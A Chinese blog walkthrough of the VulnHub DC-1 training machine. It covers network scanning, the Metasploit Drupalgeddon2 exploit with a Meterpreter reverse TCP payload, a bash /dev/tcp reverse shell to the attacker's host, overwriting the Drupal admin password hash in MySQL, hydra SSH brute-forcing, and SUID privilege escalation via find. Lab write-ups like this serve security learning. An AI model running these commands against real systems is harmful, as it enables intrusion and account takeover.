VulnHub_DC靶机系列(dc-1)

最新推荐文章于 2024-03-12 11:35:32 发布
最新推荐文章于 2024-03-12 11:35:32 发布
阅读量640 收藏 1
点赞数 2
分类专栏: 渗透测试 DC靶机 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/105834119
版权

 
由于是学生党,只除了网上挖洞以外,看来只能自己搭环境或者网上下载靶机来做实验。
虽然与真实场景相差很大,但是也是一种提高实战能力的途径之一。
 

X00靶机环境

接下来用DC-1靶机做渗透的一个实验及记录
先在VulnHub上下载dc-1靶机(最好使用Virtualbox,避免卡顿)
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/
~~ Kali和DC-1尽量使用桥接模式
在这里插入图片描述
在这里插入图片描述

X01渗透攻击

老规矩,先用 arp-scan -l 扫描局域网内的主机。发现目标主机!
在这里插入图片描述

nmap!查看主机存活
在这里插入图片描述
80端口开放,使用浏览器访问查看一下。dc-1 http服务采用 drupal CMS 网络管理系统
在这里插入图片描述

扫描网站目录可用dirb工具,通过目录扫描,从 UPGRADE.txt 找到drupal CMS版本为7.x

启动Metersploit,去msf查找该版本相关漏洞

msfconsole

search drupal

在这里插入图片描述
选择最新版本漏洞实施攻击,4 exploit/unix/webapp/drupal_drupalgeddon2

use exploit/unix/webapp/drupal_drupalgeddon2     #APL注入

info   #查看漏洞信息
set payload   #(按两下tab) 查看有哪些payload可以实施

set payload php/meterpreter/reverse_tcp   #设置TCP反弹连接

set RHOST 靶机IP   #靶机
set LHOST 攻击机IP   #攻击机
exploit  开始攻击

获取shell,与靶机成功建立会话
在这里插入图片描述

X02后渗透,开始找FLAGS

pwd  #查看当前建立会话路径
ls  #查看当前连接会话服务器的目录文件

在这里插入图片描述
发现有给flag1.txt的文件,打开看一下

cat flag1.txt

在这里插入图片描述
意思是让我们去找下CMS的配置文件

cd sites/default  #跳转到CMS目录
cat settings.php   #查看配置文件

在这里插入图片描述

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

直接选择登录它数据库

netstat -anptl | 3306  #查看开放3306端口

发现不能远程访问,只允许本地访问,需要建立个持续性连接,做个shell反弹,我们在这先监听2333端口

python -c 'import pty;pty.spawn("/bin/bash")'   #在靶机通过python调的bash,进入交互式shell
bash -i >& /dev/tcp/[攻击机IP]/2333 0>&1

mysql -udbuser -pR0ck3t  #进入mysql 
show databses;
use drupaldb;
show tables;
select * from users\G

想到CMS一般都会有重置密码的方式,搜一下drupal7重置密码,

php scripts/password-hash.sh ajest  #调用脚本生成密码为ajest的密文
$S$Dw.OhjtAffKeQN3V/UEW1BFEb3.y.6EiKlRNC5mNqIHpfIi0aETk  #ajest密文
update users set pass="$S$Dw.OhjtAffKeQN3V/UEW1BFEb3.y.6EiKlRNC5mNqIHpfIi0aETk" where uid=1;  覆盖原先uid=1用户的密码

update users set pass=“ S S SDw.OhjtAffKeQN3V/UEW1BFEb3.y.6EiKlRNC5mNqIHpfIi0aETk” where uid=1; #覆盖原先uid=1用户的密码

寻找flag4:
cat /etc/passwd
尝试爆破ssh22端口

hydra -l(指定用户名) flag4 -P(指定字典) /usr/share/john/password.lst [靶机IP] ssh -vV -f -o hydra.ssh
[22][ssh] host: 10.13.26.250   login: flag4   password: orange
ssh flag4@[靶机IP]  #登录ssh

进入ssh
在这里插入图片描述
这时应该到最后一步需要提权

提权:我选择以下提权方式
检查系统是否有一些命令有SUID标识。
有很多命令具有SUID,在执行的过程中会短暂的获取ROOT权限。用该权限调用bash

find / -perm -4000 2>/dev/null  #查找具有SUID权限的命令

在这里插入图片描述
find命令可以调用bash

find ajest -exec 'whoami' \;  
find ajest -exec '/bin/sh' \;

X03提权成功,找到最后的flag

在这里插入图片描述

**************************************************************
Giao!!!

想冲大厂的癞蛤蟆
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机DC系列-DC-1
m0_54525483的博客
12-21 211
Vulnhub靶机DC系列-DC-1 靶场名称:DC-1 下载地址: DC-1.zip (Size: 733 MB) http://www.five86.com/downloads/DC-1.zip (Mirror): https://download.vulnhub.com/dc/DC-1.zip (Torrent): https://download.vulnhub.com/dc/DC-1.zip.torrent (Magnet) VMware->文件->打开->选中 .
Vulnhub - DC-1
最新发布
qq_46081990的博客
03-14 338
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2877
Vulnhub靶机渗透学习——DC-9
DC-1靶场详解
苏生要努力
03-12 2596
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 250
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
Vulnhub 靶机DC-1
Lee_yc的博客
08-18 210
扫描局域网中的IP地址,确定靶机ip arp-scan -l
VulnHubDC-1
qq_45434762的博客
03-21 822
先进行一个粗糙的端口扫描首先我们对靶机所开放的端口进行扫描,发现有22,80,111端口开放Flag1既然开放了80端口,进去看看发现是Dupal CMS没有什么想法,现在MSF中搜一...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
复现DC-1靶机.pdf
03-22
复现DC-1靶机.pdf
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub入门实战1-DC:1
Yisonj的博客
11-25 2412
Vulnhub入门实战1-DC:1 前言 为了更好的学习Kali渗透测试相关内容,近期接触到Volunhub平台,一个免费提供漏洞靶机进行渗透测试的平台。 实验准备 DC:1靶机下载 kali系统(本实验采用kali-linux-2020-3-live-amd64-iso) 靶机导入,采用VirtualBox和VMware均可 虚拟机准备,将目标靶机DC:1和攻击机kali系统设置为在同一局域网内,本实验采用(NAT模式) 实验目的 查看DC:1的介绍 DC-1是一个专门构建的易受攻
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2705
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
Vulnhub DC-2靶机渗透测试(DC系列
Alexhirchi的博客
08-31 601
VulnHub 入门DC系列DC-2 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-1,292/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 在测试之前需要修改一下host文件的配置,添加渗透靶机的IP地址和域名(访问渗透靶机时80端口时,他会自动跳转成dc-2 不修改会无法访问。) host文件位置 kail环境:/etc/host.conf windows环境:C:\Windows\System32\drive
[Vulnhub] DC-1
weixin_63231007的博客
07-06 683
目录信息搜集msf--Drupal漏洞利用SUID提权Drupal使用CVE2014-3704 添加管理员账号下载地址:DC: 1 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ip靶机ip:192.168.236.137nmap -A 192.168.236.137 扫描一下靶机开放哪些服务 访问 靶机ip 发现是用Drupal搭建的网页 他是存在一些漏洞可以被利用的。我们之前在Lampiao 靶机中进行了msf--Drupal漏洞利用。我们这里打开msfconsol
vulnhub靶机DC-1
Keepb1ue的博客
09-28 1847
文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权: 靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机DC1 (VirtualBox) IP:192.168.56.110 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明,而DC-1需要寻找的flag总数为
vulnhub靶机系列
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值